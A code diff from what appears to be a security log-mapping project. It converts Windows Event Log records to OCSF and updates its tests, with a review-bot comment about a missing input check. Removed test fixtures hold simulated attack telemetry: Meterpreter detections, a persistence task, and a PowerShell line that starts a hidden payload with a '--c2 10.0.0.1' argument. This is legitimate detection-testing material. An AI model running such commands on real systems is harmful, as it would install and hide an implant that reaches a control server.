diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index 1a25a06..ac8837f 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -1,18 +1,19 @@ --- -description: Microsoft Windows Event Log → OCSF +description: Structured Microsoft Windows Event Log → OCSF args: - positional: - - name: log - description: The field that holds the raw Windows Event Log event as XML. - type: field + named: + - name: raw + description: Raw Windows Event Log XML to preserve in OCSF `raw_data`. + default: null --- -ocsf = {} - -ocsf.raw_data = $log -ocsf.raw_data_size = $log.length_bytes() +windows = this -windows = $log.parse_winlog() +ocsf = {} +if $raw != null { + ocsf.raw_data = $raw + ocsf.raw_data_size = $raw.length_bytes() +} ocsf.metadata = { event_code: windows.System.EventID.string(), diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index a6a7edd..eaa3966 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -microsoft::asim::map data +this = data.parse_winlog() +microsoft::asim::map name = @name select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventProduct, EventVendor, EventOriginalType, diff --git a/microsoft/tests/ocsf/eid-0100.tql b/microsoft/tests/ocsf/eid-0100.tql index 28242cd..ba407bd 100644 --- a/microsoft/tests/ocsf/eid-0100.tql +++ b/microsoft/tests/ocsf/eid-0100.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0100.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0100.txt b/microsoft/tests/ocsf/eid-0100.txt index cdd4ffe..dd0e623 100644 --- a/microsoft/tests/ocsf/eid-0100.txt +++ b/microsoft/tests/ocsf/eid-0100.txt 
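Review bot: `windows = this` in microsoft/operators/windows/ocsf/map.tql now assumes an already-parsed Windows Event Log record, but nothing checks that the expected structure is present; an input that is still a raw XML string — the calling convention this commit removes — would reach `windows.System.EventID.string()` with null fields and produce an OCSF record with empty metadata rather than an error. A guard ahead of the assignment in the style microsoft/operators/asim/ocsf/helpers/unsupported.tql already uses, such as `assert System? != null, message={...}` naming the operator and pointing at `parse_winlog()`, would turn the silent mis-mapping into a pipeline diagnostic. The frontmatter `description` could also state the precondition explicitly, e.g. `description: Structured Microsoft Windows Event Log (output of parse_winlog) → OCSF`. The operator body continues past the end of the hunk.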
@@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 100\n 0\n 4\n 0\n 0x8000000000000000\n \n 30100\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n NT AUTHORITY\\SYSTEM\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n \n\n", - raw_data_size: 871, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0101.tql b/microsoft/tests/ocsf/eid-0101.tql index 3371198..a8a0536 100644 --- a/microsoft/tests/ocsf/eid-0101.tql +++ b/microsoft/tests/ocsf/eid-0101.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0101.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0101.txt b/microsoft/tests/ocsf/eid-0101.txt index 2969cf5..2deee87 100644 --- a/microsoft/tests/ocsf/eid-0101.txt +++ b/microsoft/tests/ocsf/eid-0101.txt @@ -34,8 +34,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 101\n 0\n 2\n 0\n 0x8000000000000000\n \n 30101\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {1A2B3C4D-5E6F-7A8B-9C0D-1E2F3A4B5C6D}\n -2147024894\n \n\n", - raw_data_size: 862, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-0102.tql b/microsoft/tests/ocsf/eid-0102.tql index a18d7c4..d970c62 100644 --- a/microsoft/tests/ocsf/eid-0102.tql +++ b/microsoft/tests/ocsf/eid-0102.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0102.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0102.txt b/microsoft/tests/ocsf/eid-0102.txt index 86b457d..d3d0576 100644 --- a/microsoft/tests/ocsf/eid-0102.txt +++ b/microsoft/tests/ocsf/eid-0102.txt 
@@ -34,8 +34,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 102\n 0\n 4\n 0\n 0x8000000000000000\n \n 30102\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 0\n \n\n", - raw_data_size: 852, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-0106.tql b/microsoft/tests/ocsf/eid-0106.tql index bc298a6..88bba1f 100644 --- a/microsoft/tests/ocsf/eid-0106.tql +++ b/microsoft/tests/ocsf/eid-0106.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0106.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0106.txt b/microsoft/tests/ocsf/eid-0106.txt index aa76ea2..fd47aad 100644 --- a/microsoft/tests/ocsf/eid-0106.txt +++ b/microsoft/tests/ocsf/eid-0106.txt @@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 106\n 0\n 4\n 0\n 0x8000000000000000\n \n 30106\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", - raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0129.tql b/microsoft/tests/ocsf/eid-0129.tql index 157c549..aef6b70 100644 --- a/microsoft/tests/ocsf/eid-0129.tql +++ b/microsoft/tests/ocsf/eid-0129.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0129.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0129.txt b/microsoft/tests/ocsf/eid-0129.txt index 485399c..ed2b6bf 100644 --- a/microsoft/tests/ocsf/eid-0129.txt +++ b/microsoft/tests/ocsf/eid-0129.txt 
@@ -39,8 +39,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 129\n 0\n 4\n 0\n 0x8000000000000000\n \n 30129\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 6812\n \n\n", - raw_data_size: 854, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0140.tql b/microsoft/tests/ocsf/eid-0140.tql index f0f8c55..d3b1e42 100644 --- a/microsoft/tests/ocsf/eid-0140.tql +++ b/microsoft/tests/ocsf/eid-0140.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0140.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0140.txt b/microsoft/tests/ocsf/eid-0140.txt index 1dca283..85c9ca3 100644 --- a/microsoft/tests/ocsf/eid-0140.txt +++ b/microsoft/tests/ocsf/eid-0140.txt @@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 140\n 0\n 4\n 0\n 0x8000000000000000\n \n 30140\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", - raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0141.tql b/microsoft/tests/ocsf/eid-0141.tql index cc0c3f0..74937b5 100644 --- a/microsoft/tests/ocsf/eid-0141.tql +++ b/microsoft/tests/ocsf/eid-0141.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0141.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0141.txt b/microsoft/tests/ocsf/eid-0141.txt index ea7c9e9..f84c9fb 100644 --- a/microsoft/tests/ocsf/eid-0141.txt +++ b/microsoft/tests/ocsf/eid-0141.txt 
@@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 141\n 0\n 4\n 0\n 0x8000000000000000\n \n 30141\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", - raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:35:01Z, diff --git a/microsoft/tests/ocsf/eid-0200.tql b/microsoft/tests/ocsf/eid-0200.tql index b005263..d4fe04f 100644 --- a/microsoft/tests/ocsf/eid-0200.tql +++ b/microsoft/tests/ocsf/eid-0200.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0200.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0200.txt b/microsoft/tests/ocsf/eid-0200.txt index 7410aea..cd37b92 100644 --- a/microsoft/tests/ocsf/eid-0200.txt +++ b/microsoft/tests/ocsf/eid-0200.txt @@ -45,8 +45,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 200\n 0\n 4\n 0\n 0x8000000000000000\n \n 30200\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 1032\n \n\n", - raw_data_size: 912, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0201.tql b/microsoft/tests/ocsf/eid-0201.tql index 607df7f..4433671 100644 --- a/microsoft/tests/ocsf/eid-0201.tql +++ b/microsoft/tests/ocsf/eid-0201.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0201.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0201.txt b/microsoft/tests/ocsf/eid-0201.txt index 3d16e3a..49c8184 100644 --- a/microsoft/tests/ocsf/eid-0201.txt +++ b/microsoft/tests/ocsf/eid-0201.txt 
@@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 201\n 0\n 4\n 0\n 0x8000000000000000\n \n 30201\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 0\n \n\n", - raw_data_size: 910, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-1000.tql b/microsoft/tests/ocsf/eid-1000.tql index 7a91880..60543e4 100644 --- a/microsoft/tests/ocsf/eid-1000.tql +++ b/microsoft/tests/ocsf/eid-1000.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1000.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1000.txt b/microsoft/tests/ocsf/eid-1000.txt index c4f9336..e83a5ed 100644 --- a/microsoft/tests/ocsf/eid-1000.txt +++ b/microsoft/tests/ocsf/eid-1000.txt @@ -43,8 +43,6 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, - raw_data: "\n \n \n 1000\n 0\n 2\n 100\n 0x80000000000000\n \n 8001\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n payload.exe\n 0.0.0.0\n 67df1234\n c0000005\n 000000000000a3f0\n 0x1a4c\n 01da7c3f0b9a1234\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n \n\n", - raw_data_size: 1161, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1001.tql b/microsoft/tests/ocsf/eid-1001.tql index de919fc..5ed23f8 100644 --- a/microsoft/tests/ocsf/eid-1001.tql +++ b/microsoft/tests/ocsf/eid-1001.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1001.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1001.txt b/microsoft/tests/ocsf/eid-1001.txt index b826ac0..5f1ea88 100644 
--- a/microsoft/tests/ocsf/eid-1001.txt +++ b/microsoft/tests/ocsf/eid-1001.txt @@ -42,8 +42,6 @@ name: "payload.exe", path: "C:\\tmp\\payload.exe", }, - raw_data: "\n \n \n 1001\n 0\n 4\n 0\n 0x80000000000000\n \n 8002\n \n \n Application\n WINHOST01.corp.local\n \n \n 1234567890\n APPCRASH\n Not available\n 0\n payload.exe\n 0.0.0.0\n payload.exe\n 0.0.0.0\n c0000005\n 000000000000a3f0\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n \n\n", - raw_data_size: 1159, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1002.tql b/microsoft/tests/ocsf/eid-1002.tql index 8930325..7e62840 100644 --- a/microsoft/tests/ocsf/eid-1002.tql +++ b/microsoft/tests/ocsf/eid-1002.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1002.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1002.txt b/microsoft/tests/ocsf/eid-1002.txt index 0c8a4f7..616c0dd 100644 --- a/microsoft/tests/ocsf/eid-1002.txt +++ b/microsoft/tests/ocsf/eid-1002.txt @@ -43,8 +43,6 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, - raw_data: "\n \n \n 1002\n 0\n 2\n 101\n 0x80000000000000\n \n 8003\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n 0x1a4c\n 01da7c3f0b9a1234\n 60000\n 4\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n \n\n", - raw_data_size: 966, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1006.tql b/microsoft/tests/ocsf/eid-1006.tql index cd39dbf..fb37b06 100644 --- a/microsoft/tests/ocsf/eid-1006.tql +++ b/microsoft/tests/ocsf/eid-1006.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1006.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast 
diff --git a/microsoft/tests/ocsf/eid-1006.txt b/microsoft/tests/ocsf/eid-1006.txt index 7829bd6..81eb5db 100644 --- a/microsoft/tests/ocsf/eid-1006.txt +++ b/microsoft/tests/ocsf/eid-1006.txt @@ -70,8 +70,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1006\n 0\n 3\n 0\n 0x8000000000000000\n \n 41006\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n C:\\tmp\\payload.exe\n Local machine\n Concrete\n Real-time Protection\n CORP\\jdoe\n C:\\tmp\\payload.exe\n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 1271, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1007.tql b/microsoft/tests/ocsf/eid-1007.tql index 429cf01..bbe415e 100644 --- a/microsoft/tests/ocsf/eid-1007.tql +++ b/microsoft/tests/ocsf/eid-1007.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1007.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1007.txt b/microsoft/tests/ocsf/eid-1007.txt index 4fb0a8e..0fbb9ef 100644 --- a/microsoft/tests/ocsf/eid-1007.txt +++ b/microsoft/tests/ocsf/eid-1007.txt @@ -52,8 +52,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1007\n 0\n 4\n 0\n 0x8000000000000000\n \n 41007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 1054, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-1102.tql b/microsoft/tests/ocsf/eid-1102.tql index 5bf1783..92071e4 100644 --- a/microsoft/tests/ocsf/eid-1102.tql +++ b/microsoft/tests/ocsf/eid-1102.tql 
@@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1102.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1102.txt b/microsoft/tests/ocsf/eid-1102.txt index 8bf4313..0853412 100644 --- a/microsoft/tests/ocsf/eid-1102.txt +++ b/microsoft/tests/ocsf/eid-1102.txt @@ -44,8 +44,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1102\n 0\n 4\n 104\n 0x4020000000000000\n \n 99001\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1234\n 131972735680000000\n \n\n", - raw_data_size: 949, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1116.tql b/microsoft/tests/ocsf/eid-1116.tql index c4657ce..dd1c6de 100644 --- a/microsoft/tests/ocsf/eid-1116.tql +++ b/microsoft/tests/ocsf/eid-1116.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1116.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1116.txt b/microsoft/tests/ocsf/eid-1116.txt index d59c8af..a334e6b 100644 --- a/microsoft/tests/ocsf/eid-1116.txt +++ b/microsoft/tests/ocsf/eid-1116.txt 
@@ -72,8 +72,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1116\n 0\n 3\n 0\n 0x8000000000000000\n \n 41116\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 1\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 9\n Not Applicable\n \n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 2346, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1117.tql b/microsoft/tests/ocsf/eid-1117.tql index 2c6ea04..8fda408 100644 --- a/microsoft/tests/ocsf/eid-1117.tql +++ b/microsoft/tests/ocsf/eid-1117.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1117.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1117.txt b/microsoft/tests/ocsf/eid-1117.txt index 0026ebf..40294ac 100644 --- a/microsoft/tests/ocsf/eid-1117.txt +++ b/microsoft/tests/ocsf/eid-1117.txt 
@@ -72,8 +72,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1117\n 0\n 4\n 0\n 0x8000000000000000\n \n 41117\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 2\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 2\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 2361, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-1121.tql b/microsoft/tests/ocsf/eid-1121.tql index a9cd4eb..ba6e840 100644 --- a/microsoft/tests/ocsf/eid-1121.tql +++ b/microsoft/tests/ocsf/eid-1121.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1121.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1121.txt b/microsoft/tests/ocsf/eid-1121.txt index 0f71cf6..0046897 100644 --- a/microsoft/tests/ocsf/eid-1121.txt +++ b/microsoft/tests/ocsf/eid-1121.txt 
@@ -80,8 +80,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1121\n 0\n 3\n 0\n 0x8000000000000000\n \n 41121\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n SHA256=AABBCCDDEEFF00112233445566778899AABBCCDDEEFF00112233445566778899\n CORP\\jdoe\n 4.18.24010.12\n C:\\tmp\\payload.exe\n Exploit:Win32/CVE-2024-99999\n d4f940ab-401b-4efc-aadc-ad5f3c50688a\n Block process creations originating from PSExec and WMI commands\n \n\n", - raw_data_size: 1331, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-2000.tql b/microsoft/tests/ocsf/eid-2000.tql index a6944b1..a922689 100644 --- a/microsoft/tests/ocsf/eid-2000.tql +++ b/microsoft/tests/ocsf/eid-2000.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-2000.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-2000.txt b/microsoft/tests/ocsf/eid-2000.txt index d0ebfad..c32a236 100644 --- a/microsoft/tests/ocsf/eid-2000.txt +++ b/microsoft/tests/ocsf/eid-2000.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 2000\n 0\n 4\n 0\n 0x8000000000000000\n \n 42000\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n 1.405.12.0\n 1.405.11.0\n Microsoft Malware Protection Center\n Install\n https://go.microsoft.com/fwlink/?linkid=74005\n AntiVirus\n Full\n NT AUTHORITY\\SYSTEM\n 1.1.24010.10\n 1.1.24010.10\n \n\n", - raw_data_size: 1245, severity: "Informational", severity_id: 1, time: 2024-03-23T12:35:01Z, diff --git a/microsoft/tests/ocsf/eid-4100.tql b/microsoft/tests/ocsf/eid-4100.tql index 44a701f..8bef252 100644 --- a/microsoft/tests/ocsf/eid-4100.tql +++ b/microsoft/tests/ocsf/eid-4100.tql 
@@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4100.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4100.txt b/microsoft/tests/ocsf/eid-4100.txt index f268b27..3edd2ca 100644 --- a/microsoft/tests/ocsf/eid-4100.txt +++ b/microsoft/tests/ocsf/eid-4100.txt @@ -44,8 +44,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4100\n 1\n 3\n 1\n 0x0\n \n 20100\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n -2146233087\n Access to the path 'C:\\Windows\\System32\\payload.exe' is denied.\n Error\n ConsoleHost\n 5.1.19041.4648\n {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n 5.1.19041.4648\n {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n 2\n \n Copy-Item -Path C:\\tmp\\payload.exe -Destination C:\\Windows\\System32\\\n Copy-Item\n CORP\\jdoe\n \n Microsoft.PowerShell\n \n\n", - raw_data_size: 1600, script: { name: "Copy-Item", type: "PowerShell", diff --git a/microsoft/tests/ocsf/eid-4103.tql b/microsoft/tests/ocsf/eid-4103.tql index ab4cf96..a310227 100644 --- a/microsoft/tests/ocsf/eid-4103.tql +++ b/microsoft/tests/ocsf/eid-4103.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4103.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4103.txt b/microsoft/tests/ocsf/eid-4103.txt index 80ac0b4..eb075a8 100644 --- a/microsoft/tests/ocsf/eid-4103.txt +++ b/microsoft/tests/ocsf/eid-4103.txt 
@@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4103\n 1\n 4\n 1\n 0x0\n \n 20103\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.19041.4648\n Host ID = {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n Engine Version = 5.1.19041.4648\n Runspace ID = {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n Pipeline ID = 3\n Command Name = Invoke-Expression\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 15\n User = CORP\\jdoe\n Connected User =\n Shell ID = Microsoft.PowerShell\n CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Start-Process -FilePath 'C:\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\"\n \n\n", - raw_data_size: 1553, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4104.tql b/microsoft/tests/ocsf/eid-4104.tql index e95bc7d..90d213e 100644 --- a/microsoft/tests/ocsf/eid-4104.tql +++ b/microsoft/tests/ocsf/eid-4104.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4104.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4104.txt b/microsoft/tests/ocsf/eid-4104.txt index c6a085e..7ecd496 100644 --- a/microsoft/tests/ocsf/eid-4104.txt +++ b/microsoft/tests/ocsf/eid-4104.txt 
